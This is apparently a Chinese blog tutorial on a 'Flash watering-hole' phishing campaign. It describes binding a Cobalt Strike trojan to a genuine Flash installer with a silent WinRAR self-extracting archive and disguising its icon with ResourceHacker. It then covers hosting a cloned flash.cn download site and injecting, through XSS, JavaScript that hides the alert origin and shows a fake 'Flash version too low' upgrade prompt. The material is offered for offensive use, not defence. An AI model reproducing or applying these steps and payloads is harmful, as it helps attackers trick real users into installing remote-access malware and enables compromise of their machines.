Flash水坑钓鱼

Flash水坑钓鱼

    • 起因
    • 准备
    • 先配置一个马子吧
    • 自解压捆绑文件的利用
      • 上传到服务器
    • 常见用法

起因

在网络上看到许多大佬都拿这个钓鱼,而且感觉成功率贼高。
未雨绸缪,先测试一下,以后肯定用的到

准备

flash官网的钓鱼源码:https://github.com/r00tSe7en/Fake-flash.cn
一个服务器
一个域名
一个马子

先配置一个马子吧

  • 使用常用的CS吧,随便来一个,成功上线
    Flash水坑钓鱼_第1张图片
  • 关于免杀,暂时就不了(因为菜)
  • 推荐使用一个好的隐藏方式

自解压捆绑文件的利用

捆版木马时碰到一个问题大多捆绑软件本身就会被杀软查杀,所以选择利用winrar实现捆绑。

  1. 准备好的木马和flash安装程序

  2. 鼠标右键,添加到压缩文件。

点击创建自解压格式压缩文件
Flash水坑钓鱼_第2张图片
4. 点击高级自解压选项-------------------常规
Flash水坑钓鱼_第3张图片

使用绝对路径 -------------- C:\windows\temp

Flash水坑钓鱼_第4张图片

  1. 设置---------提取后运行
C:\windows\temp\flash.exe

C:\windows\temp\flashplayer_install_cn.exe

Flash水坑钓鱼_第5张图片

  1. 安静模式---------全部隐藏

Flash水坑钓鱼_第6张图片

  1. 更新
更新方式----解压并更新文件

覆盖方式----覆盖所有文件

Flash水坑钓鱼_第7张图片

  1. 确定,出去把文件名改的像一点
    Flash水坑钓鱼_第8张图片
  2. 这图标也不像啊,得改
    Flash水坑钓鱼_第9张图片
  3. 使用 ResourceHacker 把图标改了,自行下载
  4. 通过ResourceHacker打开原版的flash安装程序,点击Icon Group文件夹中的文件,鼠标右键保存“*.ico资源”,即可导出ico图标。
    Flash水坑钓鱼_第10张图片
  5. 同样的方法----ResourceHacker打开刚刚打包好的文件,点击Icon Group文件夹中的文件,鼠标右键替换ico图标,最后保存

Flash水坑钓鱼_第11张图片
Flash水坑钓鱼_第12张图片
最后保存成功,图标搞定Flash水坑钓鱼_第13张图片

  • 捆绑木马就做好了。下面是运行截图,伪装的完美,全程无感知,就是没有做木马的免杀如果有杀毒软件会报毒。
  • Flash水坑钓鱼_第14张图片
  • 也能上线在这里插入图片描述
  • 马子完成了。

上传到服务器

跟前情况自己开服务,我就直接装了了一个Apache
Flash水坑钓鱼_第15张图片
修改fake网站的源码,把链接加进去。

Flash水坑钓鱼_第16张图片
上传到服务器看效果

Flash水坑钓鱼_第17张图片
还可以,就是域名方面需要进一步的伪造,要买一个不错的域名更佳

常见用法

直接给地址让下载这个可能性太低了,感觉还是需要XSS打进去,弹框提示上钩的几率最大,这也大家常用的方法之一。
但是有个问题不能让看出是弹窗,最后是可以隐藏掉网站显示

//重写alert方法,去掉地址显示
window.alert = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src", 'data:text/plain,');
document.documentElement.appendChild(iframe);
window.frames[0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}

//重写confirm方法,去掉地址显示
window.confirm = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src", 'data:text/plain,');
document.documentElement.appendChild(iframe);
var result = window.frames[0].window.confirm(name);
iframe.parentNode.removeChild(iframe);
return result;
}
  

Flash水坑钓鱼_第18张图片

window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问改页面!");window.location.href="https://www.baidu.com";

可以直接在XSS平台里面建一个模块,然后xss打出去,要不太长了代码

你可能感兴趣的:(WEB,漏洞复现和分析)